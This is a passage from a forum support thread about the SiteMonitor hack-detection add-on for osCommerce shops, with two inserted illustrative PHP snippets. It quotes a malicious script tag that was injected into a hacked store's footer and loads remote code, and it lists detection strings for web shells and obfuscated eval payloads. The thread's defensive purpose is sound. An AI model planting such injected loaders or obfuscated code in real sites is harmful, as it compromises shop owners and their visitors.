Jack_mcs

SiteMonitor


Spooky

 

It is a standard site

 

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
<script src="http://nt02.co.in/3"></script></body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

Will now check the version I'm running but it won't be till after 14:00.

 

I've been changing the hacker code, starting another admin option, and running the bottom option Hacker test manually. I did this about 20 times trying to see what worked and what didn't, and now my db user name and admin are prompted on the configure page and I have to change it to my shop admin.

 

Another spooky occurrence. Looks like my SM config has been reset.

 

Cheers

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.


Installed 2.7 and all seems fine.

 

Also added

 

,'Meher Assel', 'nt02', '<script src', '<iframe src'

 

to hacker code.

 

For others here is a useful link

 

http://www.stopbadware.org/home/security

 

and once you have cleaned your site don't forget to resubmit it to Google. This can be done via Google's Webmaster Tools.

 

HTH

 

G


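An added example, not SiteMonitor's code or part of any post in this thread: a PHP substring scan over the kind of signature list discussed above, run against a constructed footer modelled on the one in the first post. `scan_source()`, `tep_get_filesystem_root()` and `count_retrievals()` are hypothetical names; the second pass shows how whole-word matching stops short signatures such as `system` and `eval` from firing on harmless identifiers.

```php
<?php
// Added illustration, not SiteMonitor's code. The signatures are strings
// posted in this thread; scan_source() is a hypothetical helper.
$signatures = array('base64_decode', 'eval', 'system', 'nt02', '<script src', '<iframe src');

// Return one hit per (line, signature) pair. With $wholeWord set, signatures
// made only of word characters must not touch a letter, digit or underscore.
function scan_source($source, array $signatures, $wholeWord)
{
    $hits = array();
    foreach (preg_split('/\r\n|\r|\n/', $source) as $i => $line) {
        foreach ($signatures as $sig) {
            if ($wholeWord && preg_match('/^\w+$/', $sig)) {
                $re = '/(?<![A-Za-z0-9_])' . preg_quote($sig, '/') . '(?![A-Za-z0-9_])/i';
                $found = preg_match($re, $line) === 1;
            } else {
                $found = stripos($line, $sig) !== false;
            }
            if ($found) {
                $hits[] = array('line' => $i + 1, 'signature' => $sig, 'text' => trim($line));
            }
        }
    }
    return $hits;
}

// Constructed sample modelled on the footer in the first post. Line 2 is a
// harmless, made-up helper call; line 4 is the injected tag quoted there.
$footer = <<<'EOT'
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<?php $root = tep_get_filesystem_root(); $n = count_retrievals(); ?>
<br>
<script src="http://nt02.co.in/3"></script></body>
EOT;

foreach (array(false, true) as $wholeWord) {
    echo $wholeWord ? "whole-word matching:\n" : "plain substring matching:\n";
    foreach (scan_source($footer, $signatures, $wholeWord) as $hit) {
        printf("  line %d  %-12s %s\n", $hit['line'], $hit['signature'], $hit['text']);
    }
}
```

Whole-word mode still reports the injected line through `nt02` and `<script src`; it only drops the `system` and `eval` hits on the harmless second line.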

Hi,

We just installed SiteMonitor and are running into 'Internal Server Error Error 500' on some of the sites we installed it on when we run sitemonitor.php. This error only occurs if there have been any files added, renamed or deleted. We do not get this error when we check for 'Hacked Files'.

 

We can recreate the error by:

- create a new reference file (sometimes this generates the '500' error so we delete it manually)

- execute SiteMonitor (either button)

- no differences so it finishes without error

- add, rename or delete a file (renaming a file reproduces it every time)

- execute SiteMonitor (either button)

- Internal Server Error Error 500

 

The sites have about 4,000 files that are being checked (we've excluded as many as possible). The code just stops part way through the 'file size checks' if the file counts don't match (which they don't when a file has been renamed).

 

* We're running PHP 5.2.14 on a Linux server.

* All the sites we've installed it on are using the same master hosting account.

* The error happens at about the 20 - 25 second mark while running.

* Our max_execution_time is 60 seconds.

* Our memory_limit is 256MB.

* We get the error when running it via the sitemonitor_admin or the cron job.

* The server logs only show Premature end of script headers: /user/html/site/store/admin/sitemonitor_admin.php

 

Any help with this issue would be greatly appreciated.

 

 

WSG


Did you see this at the bottom of the read me?

 

- If the script times out when first ran, it is probably due to a large number
 of files in your account and/or a server with a load timeout value set. To
 get around that, change the url to 
 http://YOUR_DOMAIN_NAME/YOUR_ADMIN/sitemonitor_configure_setup.php?override=1
 and press enter. That will allow the configure section to load so that more 
 files can be excluded.

 

May help, but probably not.

 

HTH

 

G

 

Another string for hacker code

 

 

Hmei7



Yes, php 5 is more secure. However, upgrading to it might cause some coding problems to appear, especially if you go to 5.3 or above. They can be fixed but you need to be prepared for them.

 

Well, I changed to PHP5 by adding "SetEnv PHP_VERSION 5" to the htaccess file.

Version reported by phpinfo: PHP Version 5.2.13

 

But, still the same problem. How weird. Especially like I said, the same site works locally on a Uniserver perfectly... Any other suggestions would be very welcome. :(


BTW, to be honest, I think it has something to do with the created referencefile, no? I don't know exactly how the online reference file has to look like, but this is the difference in online and local:

online: .account.php,9647,1291745071,644

local: Z:/www/local/account.php,9647,1291745071,666

 

So, the online files start with a period, whereas the local files mention the full path. Does that seem correct to you?


No, that's not right. The entry in the start directory settings should be shown before the file. I'm assuming your start directory is correct since you can run the script but there may be some mistake in your configure file causing it. You should take a look at this thread to be sure yours is correct.


And again; thanks for keeping track.

 

I thought you had a point and we were about to solve it, but no luck.

In the configure files, my original FS path was ../ which I changed to /home/www/mysite.com/ after checking that in ServerInfo as suggested in that thread. And the site keeps functioning. But Sitemonitor still doesn't like it and hasn't changed. In the startdirectory of SiteMonitor I HAVE to put ../ otherwise it will stick in the configure panel.

If I put for instance /home/www/mysite.com/ it will say:

Your username is invalid. Please change it and try again.: System -> ../ - SiteMonitor -> /home/www/mysite.com/

 

I feel we're close, but don't know what else to check...


The path in that message that follows system is what SiteMonitor thinks the start directory should be set to and it won't work correctly, most likely, if it isn't.


Yep, that's what I gathered as much, but I can't change it to anything other than ../ without that message appearing :'(


Unfortunately, I'm out of ideas. This doesn't sound like something that can be fixed in a support thread.


Jack

 

I have a site with thousands of images and have used the option

 

http://www.site.dk/magic/xxxxxxx/sitemonitor_configure_setup.php?override=1

 

This will show the config 50% of the time the other 50% gives a blank page.

 

My configure file, amended for security and anonymity, contains

 

<?php
/************** THE OPTIONS AND SETTINGS ****************/
$always_email = 0; //set to 1 to always email the results
$verbose = 0; //set to 1 to see the results displayed on the page (for when running manually)
$logfile = 0; //set to 1 to see to track results in a log file
$logfile_size = 100000; //set the maximum size of the logfile
$reference_reset = 3; //delete the reference file this many days apart

$quarantine = 0; //set to 1 to move new files found to the quarantine directory

$to = 'shop@abc.dk'; //where email is sent to
$from = 'From:shop@abc.dk'; //where email is sent from
$start_dir = '/hsphere/local/home/yyy/abc.dk/magic'; //your shops root
$admin_dir = 'http://www.abc.dk/magic/admin'; //your shops admin
$admin_username = 'usradmin'; //your admin username
$admin_password = 'pw!'; //your admin password
$excludeList = array('admin/quarantine', 'cgi-bin','admin','admin/images','images'); //don't check these directories - change to your liking - must be set prior to first run
$hackIgnoreList = array('jpg', 'jpeg','gif','png','txt','zip'); //don't check these types of files - change to your liking
$hackCodeSegments = array('error_reporting(0)', 'base64_decode','<frame','gzdecode','eval','ob_start("security_update")', 'Goog1e_analist_up', 'eval(gzinflate(base64_decode', 'Web Shell', '@eval', ' header;', 'shell_exec', 'system','SetCookie','xx'); //enter any hacker code that you would like to check for
?>

 

When I update I just get a blank page.

 

Is there something else I can do to exclude the image directory and get it to check the rest of the site?

 

TIA

 

G



The override option should load the configure settings without reading in the shops directories so it shouldn't timeout. That's strange that that is happening and I don't have a reason why it is. But to try to get around that, you can edit the configure file manually and add all of the directories, or at least the large ones like images and includes, to see if that lets it run. Be sure to delete the reference file. If it still fails, then there is probably some file in the root that is causing the problem. The idea behind troubleshooting this sort of problem is to reduce the number of files being checked to the absolute minimum and then increase until it works.


My guess is that it has to do with permissions or some other server setting that is preventing the script from working correctly. If both hosts use a php.ini file, try comparing the two to see what differences there might be.

 

Jack, catching up on this from last September. I just moved my second store to my new host, and the installation and functioning of Site Monitor is just fine. Now that I moved two shops from the old host (where I could not get Site Monitor to work beyond the 2.4 level) to the new host (where upgrading to 2.7 went easily), it appears to me that the problem was something within the host.

 

I have noticed a couple other differences in how osC works on the new host, so it's apparent to me osC shops don't necessarily work the same from one host compared to another. I wish I had the technical background to figure this out but I don't so I can only report observations.

 

Anyway, Site Monitor 2.7 up and running on both shops now.

 

Thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.


Thanks for the update.


After sanitizing the files on my client's site, I installed this.

 

Great contribution.

 

I had issues at install, but read the entire thread and now everything works fine.

 

Just the phrase 'base64' will send shivers up my spine after this hack on my client's store.

 

Thanks again.


There is something wrong in your admin (no idea where) since there isn't any code in SiteMonitor to cause it to go to the customer section. I can't even offer a suggestion on this one.

 

Are any of the files in the contribution supposed to be made world writable? I saw no mention of changing any permissions in the documentation.

 

Thanks!


It depends upon how your server is set up. The majority, in my experience, don't require any changes. But I have run across some servers that need them to be changed.


Jack, I am dealing with the 30 second timeout issue when attempting to delete the reference file. Reading back through the thread I found that time outs are server set. My tech support helped me set up a php.ini file to override the 30 second time out. After installation we verified the max_execution_time was reset to 90 seconds. But when I run the delete reference file, I still get a 30 second timeout error.

Guidance please.

Thanks



There's nothing in the code that limits the time the script runs so the timeout is still coming from the server. The settings in local php.ini files won't always be allowed on shared servers. Otherwise every site on the server might set their limit to maximum and the server would quickly fail.


OK, just double checking as the tech guy theorized it was a code issue.

 

I was surprised I could change the settings with a php.ini because I did read your earlier post on shared server restrictions. But the tech guy said that wasn't a problem with them. Even the php_info page he set up for me verified the change was made.

 

I will work with the tech guy further on this. In the meanwhile, I think I have a work around with this. I exclude 'images', run the code and it doesn't time out. I then remove the 'images' exclusion, run the code and it runs with no time out.

 

Thanks for the response and Happy Holidays.



Hi Jack,

v2.7

Hope all is excellent with you.

When using the 3rd Update button

(Manually Execute Sitemonitor)

getting numerous (36) messages like: (all in the phpids folder, btw)

permissions Mismatch on includes/phpids/lib/IDS/tmp/URI/4.1.1 Currently set to "0" was set to "327"

permissions Mismatch on includes/phpids/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer/CSS/4.1.0 Currently set to "0" was set to "22628"

 

not sure how to decipher Currently set to "0" was set to "327" (or the variations)

since I deleted the contents of the reference file and created a new one with the top button prior to clicking the 3rd button

so what is being compared

1. What is causing it to be set to 0?

2. Should it be reset to the original value?

3. Is this a sign of some skullduggery?

 

Thanks for helping me better understand,

jk


The code run when the third button is used is the same as for the first except the reference file isn't replaced and the output is displayed on the screen. If you click on the second update button is the email you receive clean of errors? If it is, I haven't a clue why the second would work and not the third. If it isn't, then it would seem your reference file is not being created correctly somehow.


Thanks for your response. Using localhost, unable to send emails at present, so used 3rd button for display. It seems there's something about those phpids/files that may explain the reset messages. I'm just unclear why on a fresh reference file there would be anything to compare ie. Currently set to "0" was set to "327". I'm presuming this indicates the reference file is otherwise working properly for the other 6000+ files.

 

Ran the 3rd button again:

Sitemonitor ran on December 19, 2010, 9:22 am

Total mismatches found were 18

Total files being monitored is 6762

Email sent to shop owner.

 

Checked the first flagged file:

Difference found: New-> includes/phpids/lib/IDS/tmp/CSS/4.1.1 Original-> 801ad73acbcf9d3127e1d01768d26453

 

Navigated to the file (includes/phpids/lib/IDS/tmp/CSS/4.1.1)

 

Name of file:

4.1.1,801ad73acbcf9d3127e1d01768d26453,1.ser

 

Is that comma between 4.1.1 and 8 causing this file to be listed?

If so, what is the remedy?

 

Thanks for your invaluable input,

jk


That is an invalid filename. SiteMonitor can't handle invalid filenames.

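An added example, not SiteMonitor's code or part of any post in this thread: how a comma inside a filename shifts the fields of a comma-separated reference line, which is consistent with the mismatch messages reported above. The field order (path, size, mtime, permissions) is inferred from the sample line posted earlier in the thread, the size, timestamp and permission values are constructed, and both function names are hypothetical.

```php
<?php
// Added illustration, not SiteMonitor's code. Assumed line format, inferred from
// the sample posted in this thread: path,size,mtime,permissions

// Naive reading: split on every comma and take the first four fields.
function parse_naive($line)
{
    $f = array_pad(explode(',', rtrim($line, "\r\n")), 4, '');
    return array('path' => $f[0], 'size' => $f[1], 'mtime' => $f[2], 'perms' => $f[3]);
}

// Right-anchored reading: the last three fields are numeric metadata, so
// everything before them is the path, commas included.
function parse_right_anchored($line)
{
    if (!preg_match('/^(.+),(\d+),(\d+),(\d+)$/', rtrim($line, "\r\n"), $m)) {
        return null; // malformed line: report it rather than guess
    }
    return array('path' => $m[1], 'size' => $m[2], 'mtime' => $m[3], 'perms' => $m[4]);
}

// Constructed reference lines. The second filename is the one quoted in the
// thread; its size, mtime and permissions are made up for the example.
$lines = array(
    'includes/footer.php,9647,1291745071,644',
    'includes/phpids/lib/IDS/tmp/CSS/4.1.1,801ad73acbcf9d3127e1d01768d26453,1.ser,327,1292750520,644',
);

foreach ($lines as $line) {
    $naive = parse_naive($line);
    $safe  = parse_right_anchored($line);
    echo "line:  $line\n";
    printf("naive: path=%s size=%s mtime=%s perms=%s\n",
        $naive['path'], $naive['size'], $naive['mtime'], $naive['perms']);
    if ($safe === null) {
        echo "safe:  malformed line\n\n";
        continue;
    }
    printf("safe:  path=%s size=%s mtime=%s perms=%s\n",
        $safe['path'], $safe['size'], $safe['mtime'], $safe['perms']);
    // A checker that trusts the naive fields would look up a path that does not
    // exist and compare its (absent) permissions against the stored size.
    if ($naive['path'] !== $safe['path']) {
        echo "note:  naive path is truncated at the first comma\n";
    }
    echo "\n";
}
```

For the second line the naive reading puts the file's size in the permissions column, the same shape as the reported 'Currently set to "0" was set to "327"'.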
